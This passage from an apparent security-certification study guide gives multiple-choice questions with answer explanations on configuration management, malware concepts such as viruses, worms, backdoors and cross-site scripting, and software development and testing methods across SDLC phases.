c. The cost not to mitigate = W × T × R, where W is the number of computers or workstations, T is the time spent fixing systems plus lost user productivity, and R is the hourly rate of time spent or lost. During downtime, the computer owner or user is without a computer to do their work, so that lost time should be added to the time required to rebuild a computer. This translates into $560,000 (i.e., 1,000 computers × 8 hours × $70 per hour). $280,000 is incorrect because it fails to take into account the lost user productivity time; it translates into 1,000 computers × 4 hours × $70 per hour. $500,000 is incorrect because it assumes the budget for in-house technical support. $600,000 is incorrect because it assumes the budget for outsourced technical support.
1027
What is the major principle of configuration management? a. To reduce risks to data confidentiality b. To reduce risks to data integrity c. To reduce risks to data availability d. To provide repeatable mechanism for effecting system changes
d. The major principle of configuration management is to provide a repeatable mechanism for effecting system modifications in a controlled environment. Achieving a repeatable mechanism can automatically achieve the other three choices.
1027
Which of the following refers to the Reference Monitor concept? a. It is a system access control concept. b. It is a system penetration concept. c. It is a system security concept. d. It is a system-monitoring concept.
a. The Reference Monitor concept is an access control concept that refers to an abstract computer mediating all accesses to objects by subjects. It is useful to any system providing multilevel secure computing facilities and controls.
1028
Which of the following is a malicious code that replicates using a host program? a. Boot sector virus b. Worm c. Multi-partite virus d. Common virus
d. A common virus is a code that plants a version of itself in any program it can modify. It is a self-replicating code segment attached to a host executable. The boot-sector virus works during computer booting, where the master boot sector and boot sector code are read and executed. A worm is a self-replicating program that is self-contained and does not require a host program. A multi-partite virus combines both sector and file infector viruses.
1028
Which of the following is not an example of built-in security features? a. Authentication controls were designed during a system development process. b. Fail-soft security features were installed. c. Least-privilege principles were installed during the post implementation period. d. Fail-safe security features were implemented.
c. Built-in security means that security features are designed into the system during its development, not after. Any feature that is installed during post-implementation of a system is an example of built-on security, not built-in. Security and control features must be built in from a cost-benefit perspective.
1029
Which of the following fully characterizes an information system’s security? a. Confidentiality b. Integrity c. Assurance d. Availability
c. System assurance is the basis for confidence that the security measures, both technical and operational, work as intended to protect the system and the data and information it processes. For example, software assurance achieves trustworthiness and predictable execution. The three well-accepted, basic-level security objectives are confidentiality, integrity, and availability, and assurance can be considered an advanced-level security objective because the former culminate in the latter. What good is an information system that cannot provide full assurance with regard to its security?
1030
Which of the following is an example of both preventive and detective control? a. Audit trails b. Antivirus software c. Policies and procedures d. Contingency plans
b. Antivirus software is a preventive control in that it stops a known virus from getting into a computer system. It is also a detective control because it notifies upon detecting a known virus. Audit trails are detective controls; policies and procedures are directive controls, whereas contingency plans are an example of recovery controls.
1030
An effective defense against new computer viruses does not include which of the following? a. Program change controls b. Virus scanning programs c. Integrity checking d. System isolation
b. Computer virus defenses are expensive to use, ineffective over time, and ineffective against serious attackers. Virus scanning programs are effective against viruses that have been reported and ineffective against new viruses or viruses written to attack a specific organization. Program change controls limit the introduction of unauthorized changes such as viruses. Redundancy can often be used to facilitate integrity. Integrity checking with cryptographic checksums in integrity shells is important to defend against viruses. System or equipment isolation to limit the spread of viruses is good, too.
1031
Which of the following statements dealing with security principles is not true when securing an application environment? a. Information security functions should be isolated from nonsecurity functions. b. Design for protection mechanisms should be simple and small in size. c. Similar security controls should be placed in series and in sequence to achieve a defense-in-depth strategy. d. Data-hiding techniques should be practiced during program testing and software maintenance.
c. Defending an information system requires safeguards to be applied throughout the system, as well as at points of entry. The selection and placement of security controls should be done in a way that progressively weakens or defeats all attacks. Having a series of similar controls in succession tends only to lengthen the duration of the attack, which is not good. Applying different types of controls that complement each other and are mutually supportive is a much more effective approach to achieving a defense-in-depth strategy. Although the capabilities of available safeguards may overlap to some extent, the combined effect should exceed the effects of each control used individually. The other three choices are true statements in achieving security in an application environment. The information system isolates security functions from nonsecurity functions implemented via partitions and domains that control access to and protect the integrity of the hardware, software, and firmware that perform those security functions. Safety functions should be kept separate from one another. The design of information systems and the design of protection mechanisms in those systems should be as simple as possible. Complexity is at the root of many security issues. The principle of data hiding should be useful during program testing and software maintenance.
1032
Security controls and audit trails should be built into computer systems in which of the following system development life cycle (SDLC) phases? a. System initiation phase b. System development phase c. System implementation phase d. System operation phase
b. During the system development phase, the system is designed, purchased, programmed, developed, or otherwise constructed. During this phase, functional users and system/security administrators develop system controls and audit trails used during the operational phase.
1033
Which of the following levels of the software capability maturity model deal with security requirements? a. Initial level b. Repeatable level c. Defined level d. Optimizing level
b. In the repeatability level of the software capability maturity model, system requirements are defined; these include security, performance, quality, and delivery dates. The purpose is to establish a common understanding between the customer and the software development project team. The other three choices are not correct because each level deals with specific requirements.
1034
Which of the following is not a direct method to conduct data leakage attacks? a. Trojan horse b. Asynchronous attacks c. Logic bombs d. Scavenging methods
b. Data leakage is the removal of data from a system by covert means, and it might be conducted directly through the use of a Trojan horse, logic bomb, or scavenging methods. Asynchronous attacks are indirect attacks on a computer program that act by altering legitimate data or code at a time when the program is idle and then causing the changes to be added to the target program at a later execution.
1035
Which of the following infects both boot-sectors and file infectors? a. Worm b. Link virus c. Multi-partite d. Macro
c. Multi-partite viruses are a combination of both boot-sector and file-infector viruses, which can be spread by both methods. A worm is a self-replicating, self-contained program and does not require a host program. Link viruses manipulate the directory structure of the media on which they are stored, pointing the operating system to virus code instead of legitimate code. Macro viruses are stored in a spreadsheet or word processing document.
1036
Programmers frequently create entry points into a program for debugging purposes and/or insertion of new program codes at a later date. What are these entry points called? a. Logic bombs b. Worms c. Backdoors d. Trojan horses
c. Backdoors are also called hooks and trapdoors. Logic bomb is incorrect because it is a program that triggers an unauthorized, malicious act when some predefined condition occurs. Worms are incorrect because they search the network for idle computing resources and use them to execute the program in small segments. Trojan horses are incorrect because a Trojan horse is a production program that has access to otherwise unavailable files and is changed by adding extra, unauthorized instructions. It disguises computer viruses.
1037
Software vendors and contractors can install a backdoor entry into their own products or client’s computer systems. Which of the following are major risks arising from such installation? a. Software disconnection and hacker entry b. Remote monitoring and remote maintenance c. Software disconnection and remote monitoring d. Remote maintenance and hacker entry
a. Some vendors can install a backdoor or a trapdoor entry for remote monitoring and maintenance purposes. The good news is that the backdoor is a convenient approach to solve operational problems. The bad news is that the backdoor is wide open for hackers. Also, the vendor can modify the software at will without the user’s knowledge or permission. An unhappy vendor can disconnect a user from accessing the software as a penalty for nonpayment or disputes in payment. Access codes should be required for remote monitoring and maintenance.
1038
Countermeasures against hidden code attacks include which of the following? 1. Use war dialing software. 2. Use firewalls. 3. Use layered protections. 4. Disable active-content code. a. 1 and 2 b. 2 and 3 c. 3 and 4 d. 1 and 4
c. Hidden code attacks are based on data and information. Using layered protections and disabling active-content code (for example, ActiveX and JavaScript) from the Web browser are effective controls against such attacks. War dialing software is good at detecting trapdoors (backdoor modems) and not good against trapdoor attacks. Firewalls are effective against spoofing attacks.
1039
The scope of a functional configuration audit does not include which of the following? a. Evaluation of change control b. Testing of software product c. Tracing of system requirements d. Evaluation of test approach and results
a. Evaluation of change control is a part of the physical configuration audit, whereas the other choices are part of the functional configuration audit. The physical configuration audit provides an independent evaluation of whether components in the as-built version of the software map to the specifications of the software. Specifically, this audit is held to verify that the software and its documentation are internally consistent and ready for delivery. Activities typically planned and executed as part of the physical configuration audit include evaluation of product composition and structure, product functionality, and change control. The functional configuration audit provides an independent evaluation of configuration items to determine whether actual functionality and performance are consistent with the requirements specifications. Specifically, this audit is conducted prior to the software delivery to verify that all requirements specified in the requirements document have been met. Activities typically planned and executed as part of a functional configuration audit include testing of software products, tracing of system requirements from their initial specification through system testing, evaluation of the test approach and results attained, and evaluating the consistency between the baselined product elements.
1040
Which of the following statements is not true about applets? a. Applets are large application programs. b. Applets are written mostly in Java language. c. Applets are automatically downloaded. d. Applets are small application programs.
a. Applets are small application programs mostly written in Java programming language that are automatically downloaded and executed by applet-enabled Web browsers.
1041
The contingency processes should be tested in which of the following phases of system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
c. The contingency processes should be tested and maintained during the implementation phase of the SDLC. The capability to recover and reconstitute data should be considered during the initiation phase. Recovery strategies should be considered during the development phase. The contingency plan should be exercised and maintained during the operation/maintenance phase.
1042
A macro virus is most difficult to: a. Prevent b. Detect c. Correct d. Attach
b. A macro virus is associated with a word processing file and can damage the computer system. Macro viruses pass through the firewall with ease because they are usually passed on as either an e-mail message or simply downloaded as a text document. The macro virus represents a significant threat because it is difficult to detect. A macro virus consists of instructions in WordBasic, Visual Basic for Applications, or some other macro language, and resides in documents. Any application that supports macros that automatically execute is a potential platform for macro viruses. Now, documents are more widely shared through networks and the Internet than via disks.
1043
Which of the following is most vulnerable to Trojan horse attacks? a. Discretionary access control b. Mandatory access control c. Access control list d. Logical access control
a. Because the discretionary access control system restricts access based on identity, it carries with it an inherent flaw that makes it vulnerable to Trojan horse attacks. Most programs that run on behalf of a user inherit the discretionary access control rights of that user.
1044
Which of the following is the best place to check for computer viruses? a. Each computer b. Each workstation c. The e-mail server d. Each network
c. Virus checkers monitor computers and look for malicious code. A problem is that virus-checking programs need to be installed at each computer, workstation, or network, thus duplicating the software at extra cost. The best place to use the virus-checking programs is to scan e-mail attachments at the e-mail server. This way, the majority of viruses are stopped before ever reaching the users.
1045
What do you call attacks that can disclose the end users' session token and attack the local machine? a. Broken access control b. Unvalidated input c. Broken authentication d. Cross-site scripting flaws
d. In cross-site scripting (XSS) flaws, the Web application can be used as a mechanism to transport an attack to an end user’s browser. A successful attack can disclose the end user’s session token, attack the local machine, or spoof content to fool the user.
1046
A polymorphic virus uses which of the following? a. Inference engine b. Heuristic engine c. Mutation engine d. Search engine
c. Virus writers use a mutation engine to transform simple viruses into polymorphic ones for proliferation purposes and to evade detection. The other three choices do not deal with the transformation process.
1046
All the following techniques can help in achieving process isolation security principle except: a. Encapsulation b. Naming distinctions c. Virtual mapping d. Security kernel
d. A security kernel is defined as hardware, firmware, and software elements of a Trusted Computing Base (TCB) that implements the reference monitor concept. A security kernel cannot achieve process isolation. Techniques such as encapsulation, time multiplexing of shared resources, naming distinctions, and virtual mapping are used to employ the process isolation or separation principle. These separation principles are supported by incorporating the principle of least privilege.
1047
Defining roles and responsibilities is important in identifying infected hosts with malware incidents before security incidents occur. Which of the following groups can primarily assist with changes in login scripts? a. Security administrators b. System administrators c. Network administrators d. Desktop administrators
d. Organizations should identify which individuals or groups can assist in infection identification efforts. Desktop administrators are good at identifying changes in login scripts along with Windows Registry or file scans, and good at implementing changes in login scripts. The roles of the other three administrators are different from separation of duties, independence, and objectivity viewpoints.
1048
Which of the following is a reactive countermeasure in defending against worms? a. Integrity checkers b. Software patching c. Host firewalls d. Stateful firewalls
b. Software patching, being one of the reactive (detective) countermeasures, is mostly done after a vulnerability or programming/design error is discovered. These reactive methods have no hope of preventing fast-spreading worms or worms that use zero-day exploits to carry out their attacks. The other three choices are examples of proactive (preventive) countermeasures. Integrity checkers keep cryptographic hashes of known good instances of files so that integrity comparisons can be made at any time. Host firewalls enforce rules that define the manner in which specific applications may use the network. Stateful firewalls keep track of network connections and monitor their state.
1049
Which of the following is an effective means of preventing and detecting computer viruses coming from outside into a network? a. Install an antivirus program on the network. b. Install an antivirus program on each personal computer. c. Certify all removable media disks prior to their use. d. Train all employees about potential risks.
c. It is a common practice for some organizations to certify all removable media disks coming into the organization from outside prior to their use. This is done by a centralized group for the entire location and requires testing the disk for possible inclusion of viruses. The other three choices are effective as internal protection mechanisms against viruses.
1050
All the following are examples of measures to defend against computer viruses except: a. Access controls b. Audit trails c. Passwords d. Least privilege principle
c. Passwords are administrative controls, whereas access controls are technical controls. Access controls include discretionary access controls and mandatory access controls. An audit trail is the collection of data that provides a trace of user actions, so security events can be traced to the actions of a specific individual. To fully implement an audit trails program, audit reduction and analysis tools are also required. Least privilege is a concept that deals with limiting damage through the enforcement of separation of duties. It refers to the principle that users and processes should operate with no more privileges than those needed to perform the duties of the role they are currently assuming.
1051
Which of the following security principles balances various variables such as cost, benefit, effort, value, time, tools, techniques, gain, loss, risks, and opportunities involved in a successful compromise of security features? a. Compromise recording b. Work factor c. Psychological acceptability d. Least common mechanism
b. The goal of the work factor principle is to increase an attacker’s work factor in breaking an information system’s or a network’s security features. The amount of work required for an attacker to break the system or network (work factor) should exceed the value that the attacker would gain from a successful compromise. Various variables such as cost and benefit; effort; value (negative and positive); time; tools and techniques; gains and losses; knowledge, skills, and abilities (KSAs); and risks and opportunities involved in a successful compromise of security features must be balanced. The principle of compromise recording means computer or manual records and logs should be maintained so that if a compromise does occur, evidence of the attack is available. The recorded information can be used to better secure the host or network in the future and can assist in identifying and prosecuting attackers. The principle of psychological acceptability encourages the routine and correct use of protection mechanisms by making them easy to use, thus giving users no reason to attempt to circumvent them. The security mechanisms must match the user’s own image of protection goals. The principle of least common mechanism requires the minimal sharing of mechanisms either common to multiple users or depended upon by all users. Sharing represents possible communications paths between subjects used to circumvent security policy.
1052
Certification and accreditation needs must be considered in all the following phases of system development life cycle except: a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
d. Certifications performed on applications under development are interleaved with the system development process. Certification and accreditation needs must be considered in the validation, verification, and testing phases employed throughout the system development process (i.e., development and implementation). They do not address the operation/maintenance phase.
1053
A security evaluation report and an accreditation statement are produced in which of the following phases of the system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Operation/maintenance d. Implementation
d. The major outputs from the implementation (testing) phase include the security evaluation report and the accreditation statement. The purpose of the testing phase is to perform various tests (unit, integration, system, and acceptance). Security features are tested to see whether they work and are then certified.
1053
The activity that would be different between a prototype development approach and the traditional system development approach is: a. How are activities to be accomplished? b. What do users need from the system? c. What should a project plan contain? d. How are individual responsibilities defined?
a. Managers still need to define what they want from the system, some assessment of costs/benefits is still needed, and a plan to proceed with individual responsibilities is still required. The difference lies in the way activities are accomplished. The tools, techniques, methods, and approaches used in a prototype development project and a traditional system development project are different.
1054
Which of the following phases of a system development life cycle (SDLC) should not be compressed so much for the proper development of a prototype? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
c. System testing, which is a part of implementation, is important to determine whether internal controls and security controls are operating as designed and are in accordance with established policies and procedures. In the prototyping environment, there is a tendency to compress system initiation, definition, design, programming, and training phases. However, the testing phase should not be compressed so much for quality reasons. By definition, prototyping requires some compression of activities and time due to the speedy nature of the prototyping development methodology without loss of the main features, functions, and quality.
1055
A general testing strategy for conducting an application software regression testing includes which of the following sequence of tasks? a. Read, insert, and delete b. Precompile, link, and compile c. Prepare, execute, and delete d. Test, debug, and log
c. Each test program involves preparing the executable program, executing it, and deleting it. This saves space on mass storage and generates a complete log. This approach is recommended for debugging and validating purposes. Read, insert, and delete describe the transfer of all rows from Table A to Table B, in which a table is read, its rows are inserted, and the source rows are deleted. A source program is precompiled, linked, and compiled to become an object or executable program. A source program is tested (errors discovered), debugged (errors removed), and logged for review and further action.
1055
Which of the following tests would be conducted when an application system in an organization exchanges data with external application systems? a. Unit test b. Integration test c. End-to-end test d. System acceptance test
c. The purpose of end-to-end testing is to verify that a defined set of interrelated systems, which collectively support an organizational core business area or function, interoperate as intended in an operational environment. These interrelated systems include not only those owned and managed by the organization, but also the external systems with which they interface. Unit test is incorrect because its purpose is to verify that the smallest defined module of software (i.e., individual subprograms, subroutines, or procedures) works as intended. These modules are internal to an organization. Integration test is incorrect because its purpose is to verify that units of software, when combined, work together as intended. Typically, a number of software units are integrated or linked together to form an application. Again, this test is performed internally in an organization. System acceptance test is incorrect because its purpose is to verify that the complete system satisfies specified requirements and is acceptable to end users.
1056
Which of the following can give a false sense of security? a. A test tool that requires planning. b. A test tool that produces error-free software. c. A test tool that requires time and effort. d. A test tool that requires experience to use
b. A test tool cannot guarantee error-free software; it is neither a cure-all nor a silver bullet. For some, it may give a false sense of security. The test tool still requires careful planning, time, effort, and experience before it can be used well and provide benefit.
1057
Which of the following software configuration-management capabilities available for client/server systems can help to detect and correct errors? a. Install check-in/check-out modules. b. Archive source code. c. Allow backtracking. d. Assemble new builds.
c. Errors are made in several places and times: (i) when source code is developed, (ii) when modules are initially written, (iii) when an enhancement is being added to a module, (iv) when another error is fixed, and (v) when code is being moved from one module to another. Software configuration management products have a backtracking feature to correct these types of errors. The product should list the exact source code changes that make up each build. Then, these changes are examined to identify which one can create the new error. The concept of check-in/check-out software enables multiple developers to work on a project without overwriting one another’s work. It is a fundamental method of preventing errors from being included or reintroduced into software modules.
1057
Which of the following requires a higher level of security protection in terms of security controls? a. Test procedures b. Test cases c. Test repository d. Test plans
c. The test repository consists of test plans, test cases, test procedures, test requirements, and test objectives maintained by the software test manager. Because of the concentrated work products, the test repository needs a higher level of security protection from unauthorized changes. Test procedures, test cases, and test plans are part of test repository.
1058
From a security viewpoint, which of the following poses a severe security problem? a. Unattended computer operations b. Unattended computer terminal c. Unattended software testing d. Unattended facsimile machine
b. An unattended computer terminal represents a severe security violation. An unauthorized user could seize the opportunity to access sensitive data. The data could be copied, deleted, added to, or modified. An intruder can also use this occasion to modify executable files. A virus, Trojan horse, or a password-sniffing program could easily be slipped onto the system in no time. Security logic that detects an idle terminal is needed. Unattended computer operations are incorrect because they represent a situation where most computer operational tasks are performed by machines (robots) and fewer by people. Unattended software testing is incorrect because testing is conducted by automated test tools without a person watching the testing process. The test tool continues running the test sessions by replaying one or more test scripts. It handles unforeseen circumstances gracefully. Unattended facsimile machine is incorrect because it can lead to social engineering attacks. The unattended computer operations, software testing, and facsimile machine pose less risk than the unattended computer terminal.
1059
Which of the following application software libraries can raise questions about data ownership rights? a. Test library b. Quality assurance library c. Reusable library d. Production library
c. A reusable library can improve software productivity and quality by increasing the efficient reuse of error-free code for both new and modified application software. “Who owns the reusable code?” is a legal question that requires a careful answer due to difficulty in tracing to the original author of the software. A test library is incorrect because it is where the new software is developed or the existing software is modified. A quality assurance library is incorrect because it is a staging area where final quality reviews and production setup procedures take place. A production library is incorrect because it is the official place where operational programs reside and execute to process data. Data ownership rights in these three libraries (test, quality assurance, and production) are clear and traceable to the author(s).
1059
What do the most commonly used application program design structure metrics include? a. Check-in and check-out indicators b. Fan-in and check-out indicators c. Fan-in and fan-out metrics d. Fan-out metrics and check-in indicators
c. Fan-in and fan-out are based on program coupling. Fan-in is a count of the number of modules that call a given module, and fan-out is a count of the number of modules that are called by a given module. Both fan-in and fan-out measure program complexity. Check-in and check-out are program change controls where documents or data/program files will have a check-in or check-out indicator in system libraries to prevent their concurrent use by programmers and computer programs.
1060
Which of the following application software testing approaches does not require stubs or drivers? a. Top-down approach b. Bottom-up approach c. Sandwich approach d. Big-bang approach
d. The big-bang approach puts all the units or modules together at once, with no stubs or drivers. In it, all the program units are compiled and tested at once. Top-down approach is incorrect because it uses stubs. The actual code for lower level units is replaced by a stub, which is a throwaway code that takes the place of the actual code. Bottom-up approach is incorrect because it uses drivers. Units at higher levels are replaced by drivers that emulate the procedure calls. Drivers are also a form of throwaway code. Sandwich approach is incorrect because it uses a combination of top-down (stubs) and bottom-up (drivers) approaches.
1061
Which of the following is a less-formal review technique? a. Inspections b. Traceability analysis c. Reviews d. Walkthroughs
d. A walkthrough is an evaluation technique in which a designer or programmer leads one or more other members of the development team through a segment of design or code, while the other members ask questions, make comments about technique and style, and identify possible errors, violations of development standards, and other problems. Walkthroughs are similar to reviews but are less formal. Inspections are incorrect because they are an evaluation technique in which application software requirements, design, code, or other products are examined by a person or group other than the author to detect faults, violations of development standards, and other problems. Inspections are more formal than walkthroughs. Traceability analysis is incorrect because it is the process of verifying that each specified requirement has been implemented in the design/code, that all aspects of the design/code have their basis in the specified requirements, and that testing produces results compatible with the specified requirements. Traceability analysis is more formal than walkthroughs. Reviews are incorrect because a review is a meeting at which the requirements, design, code, or other products of a software development project are presented to the user, sponsor, or other interested parties for comment and approval, often as a prerequisite for concluding a given phase of the software development process. Reviews are more formal than walkthroughs.
1062
Inspections cannot detect which of the following errors in application software? a. Incomplete requirements errors b. Infeasible requirements errors c. Conflicting requirements errors d. Input/output description errors
d. An inspection is an evaluation technique in which software requirements, design, code, or other products are examined by a person or group, other than the author, to detect faults, violations of development standards, and other problems. Input/output description errors are detected in the interface testing phase. The types of errors detected in inspections include incomplete requirements errors, infeasible requirements errors, and conflicting requirements errors.
1063
Decision tables are used in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
a. The purpose of decision tables is to provide a clear and coherent analysis of complex logical combinations and relationships. This method uses two-dimensional tables to concisely describe logical relationships between Boolean program variables (for example, AND and OR). Advantages of decision tables include (i) their conciseness and tabular nature enable the analysis of complex logical combinations expressed in code and (ii) they are potentially executable if used as specifications. Disadvantages include that they require tedious effort. The requirements analysis, which is a part of the initiation phase, is the best place to use the decision table.
1063
Which of the following is an example of a dynamic analysis to detect application software errors? a. Inspections b. Code reading c. Testing d. Tracing
c. Dynamic analysis techniques involve the execution of a product and analysis of its response to sets of input data to determine its validity and to detect errors. The behavioral properties of the program are also observed. The most common type of dynamic analysis technique is testing. Testing of software is usually conducted on individual components (for example, subroutines and modules) as they are developed, on software subsystems when they are integrated with one another or with other system components, and on the complete system. Another type of testing is acceptance testing performed before the user accepts the product. Inspections, code reading, and tracing are examples of static analysis. Static analysis is the analysis of requirements, design, code, or other items either manually or automatically, without executing the subject of the analysis to determine its lexical and syntactic properties as opposed to its behavioral properties.
1064
Data-flow diagrams are used in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
a. Data-flow diagrams are used to describe the data flow through a program in a diagrammatic form. They show how data input is transformed to output, with each stage representing a distinct transformation. The diagrams use three types of components: 1. Annotated bubbles represent transformation centers, and the annotation specifies the transformation. 2. Annotated arrows represent the data flow in and out of the transformation centers; annotations specify what the data is. 3. Operators (AND and OR) link the annotated arrows. Data-flow diagrams describe only data and should not include control or sequencing information. Each bubble can be considered a black box that, as soon as its inputs are available, transforms them to outputs. Each bubble should represent a distinct transformation, whose output is somehow different from its input.
1064
Finite state machines (FSMs) are used in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
a. The purpose of a finite state machine (FSM) is to define or implement the control structure of a system. Many systems can be defined in terms of their states, inputs, and actions. By defining a system’s actions for each input in every state, you can completely define a system. The resulting model of the system is an FSM, which can detect incomplete or inconsistent requirements specifications.
1065
Desk-checking is practiced in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
c. In desk-checking, programming code is read by an expert, other than the author of the code, who performs any of the following: (i) looking over the code for obvious defects, (ii) checking for correct procedure interfaces, (iii) reading the comments to develop a sense of what the code does and then comparing it to its external specifications, (iv) comparing comments to design documentation, (v) stepping through with input conditions contrived to exercise all paths including those not directly related to the external specifications, (vi) checking for compliance with programming standards and conventions, or (vii) any combination of these. As can be seen, desk-checking is a technical exercise performed by programmers.
1066
Mutation analysis is performed in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
c. The purpose of mutation analysis is to determine the thoroughness with which a program has been tested and, in the process, detect errors. This procedure involves producing a large set of versions, or mutants, of the original program, each derived by altering a single element of the program (for example, changing an operator, variable, or constant). Each mutant is then tested with a given collection of test data sets. Because each mutant is essentially different from the original, the testing should demonstrate that each is different. If each of the outputs produced by the mutants differs from the output produced by the original program and from each other, then the program is considered adequately tested and correct. Mutation analysis requires good automated tools to be effective.
1067
Error-seeding is planted in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
c. The purpose of error-seeding is to determine whether a set of test cases is adequate. Some known error types are inserted into the program, and the program is executed with the test cases under test conditions. If only some of the seeded errors are found, the test case set is not adequate. One can estimate the number of errors remaining by subtracting the number of real errors found from the total number of real errors. The remaining test effort can then be estimated. If all the seeded errors are found, this indicates that either the test case set is adequate or that the seeded errors were too easy to find.
1067
Sensitivity analysis is conducted in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
c. Sensitivity analysis is a new method of quantifying ultra-reliable software during the implementation phase. It is based on a fault-failure model of software and on the premise that software testability can predict the probability that failure occurs when a fault exists, given a particular input distribution. A sensitive location is one in which faults cannot hide during testing. The internal states are disturbed to determine sensitivity. This technique requires instrumentation of the code and produces a count of the total executions through an operation, an infection rate estimate, and a propagation analysis.
1068
Boundary-value analysis is conducted in which of the following phases of a system development life cycle (SDLC)? a. Requirements b. Design c. Implementation d. Maintenance
c. The purpose of boundary-value analysis is to detect and remove errors occurring at parameter limits or boundaries. The input domain of the program is divided into a number of input classes. The tests should cover the boundaries and extremes of the classes. The tests check that the boundaries of the input domain of the specification coincide with those in the program. Test cases should also be designed to force the output to its extreme values. If possible, a test case that causes output to exceed the specification boundary values should be specified. If output is a sequence of data, special attention should be given to the first and last elements and to lists containing zero, one, and two elements.
1069
Formal methods or verification of application software is performed in which of the following phases of system development life cycle (SDLC)? a. Initiation and development b. Development and implementation c. Implementation and operation d. Operation and disposal
a. The purpose of formal methods is to check whether software fulfills its intended function. It involves the use of theoretical and mathematical models to prove the correctness of a program without executing it. The requirements should be written in a formal specification language (for example, VDM and Z) so that these requirements can then be verified using a proof of correctness. Using this method, the program is represented by a theorem and is proved with first-order predicate calculus. A number of assertions are stated at various locations in the program and are used as pre- and post-conditions to various paths in the program. The proof consists of showing that the program transforms the pre-conditions into the post-conditions according to a set of logical rules, and that the program terminates.
1070
Which of the following techniques cannot be used in all phases of a system development life cycle (SDLC)? a. Prototyping b. Reviews c. Simulation d. Walkthroughs
a. The purpose of prototyping is to check the feasibility of implementing a system against the given constraints and to communicate the specifier’s interpretation of the system to the customer to locate misunderstandings. A subset of system functions, constraints, and performance requirements is selected. A prototype is built using high-level tools and is evaluated against the customer’s criteria; the system requirements may be modified as a result of this evaluation. Usually, prototyping is used to define user requirements of the system. A review is a meeting at which the requirements, design, code, or other products of a software development project are presented to the user, sponsor, or other interested parties for comment and approval, often as a prerequisite for concluding a given phase of the software development process. A review is usually held at the end of a phase, but it may be called when problems arise. Simulation is used to test the functions of a software system, together with its interface to the real environment, without modifying the environment in any way. The simulation may be software only or a combination of hardware and software. A walkthrough is an evaluation technique in which a designer or programmer leads one or more other members of the development team through a segment of design or code, while the other members ask questions, make comments about technique and style, and identify possible errors, violations of development standards, and other problems. Walkthroughs are similar to reviews but are less formal.
1071
Techniques such as prototyping and simulation cannot be used in which of the following phases of a system development life cycle (SDLC)? a. Initiation b. Development/acquisition c. Implementation d. Operation/maintenance
d. The purpose of prototyping is to check the feasibility of implementing a system against the given constraints and to communicate the specifier’s interpretation of the system to the customer to locate misunderstandings. A subset of system functions, constraints, and performance requirements is selected. A prototype is built using high-level tools and is evaluated against the customer’s criteria; the system requirements may be modified as a result of this evaluation. Usually, prototyping is used to define user requirements and design of the system. Simulation or modeling is used to test the functions of a software system, together with its interface to the real environment, without modifying the environment in any way. The simulation may be software only or a combination of hardware and software. A model of the system to be controlled by the actual system under test is created. This model mimics the behavior of the controlled system and is for testing purposes only. Although prototyping and simulation can be used in the system maintenance phase, the payback would be less than in the development phase. Usually, the scope of system maintenance is small and minor, making it cost-prohibitive to use prototyping and simulation techniques.
1071
Which of the following requires an extensive testing effort in an application system integration project? a. Regression testing b. Interoperability testing c. Load testing d. Security testing
b. Adherence to a common standard ensures the interoperability of software components. Extensive testing is required to ensure that software components can communicate effectively in both single processor and distributed processing environments. In a networked environment, it must be remembered that, when any component is added or replaced/upgraded, a large number of tests have to be run to ensure that the integrity and performance of the network has been retained. Therefore, tests must be repeatable and well documented. Hence, regression tests are necessary. In load testing, many combinations and permutations of workload patterns can be imposed on the components of a networked configuration. Although it would be difficult, if not impossible, to test them all, a thorough analysis of the expected workload is required to identify the most likely traffic patterns for this testing procedure. By their nature, networked systems provide a great number of opportunities for violating system security. This is especially true when security levels are not uniformly imposed throughout a configuration made of multiple, interconnected local-area networks. Systemwide security testing is required to identify any security fault that may have been overlooked in the integrated system design.
1072
The capability of an application system to survive misuse by naive users is examined in which of the following testing approaches? a. Functional testing b. Performance testing c. Resiliency testing d. Recovery testing
c. Resiliency testing measures durability of the system. In functional testing, correctness of system operation under normal operating conditions is demonstrated. In performance testing, system throughput and response times under varying load conditions are demonstrated. In recovery testing, the ability of the system to resume operating after partial or total system failure is determined. Both the system and individual components are tested to determine the ability to operate within the fallback and recovery structure established for the system.
1072
From a testing viewpoint, when does a formal change control mechanism start? a. After completion of integration testing b. After completion of unit testing c. After completion of systems testing d. After completion of acceptance testing
a. Integration testing is the cutoff point for the development project, and, after integration, it is labeled the back end. Integration is the development phase in which various parts and components are integrated to form the entire software product, and, usually after integration, the product is under formal change control. Specifically, after integration testing, every change of the software must have a specific reason and must be documented and tracked. It is too early to have a formal change control mechanism during unit testing because of constant changes to program code. It is too late to have a formal change control mechanism after completing system and acceptance testing.
1073
What is the correct sequence of application software testing? a. Integration test, unit test, systems test, acceptance test b. Unit test, systems test, integration test, acceptance test c. Acceptance test, unit test, integration test, systems test d. Unit test, integration test, systems test, acceptance test
d. A system development life cycle moves through the unit test, integration test, system test, and acceptance test in that sequence. Programmers perform both the unit test and integration tests, whereas system testing is conducted jointly between users and programmers. End users and production operations staff, from their own viewpoint, perform acceptance testing. The quality of a computer system is enhanced if this sequence is followed during software testing.
1074
Effective controls during the application software-testing phase include which of the following? a. Test cases and test documentation b. Test summaries and test execution reports c. Activity logs, incident reports, and software versioning d. Test cases rejected and test cases accepted
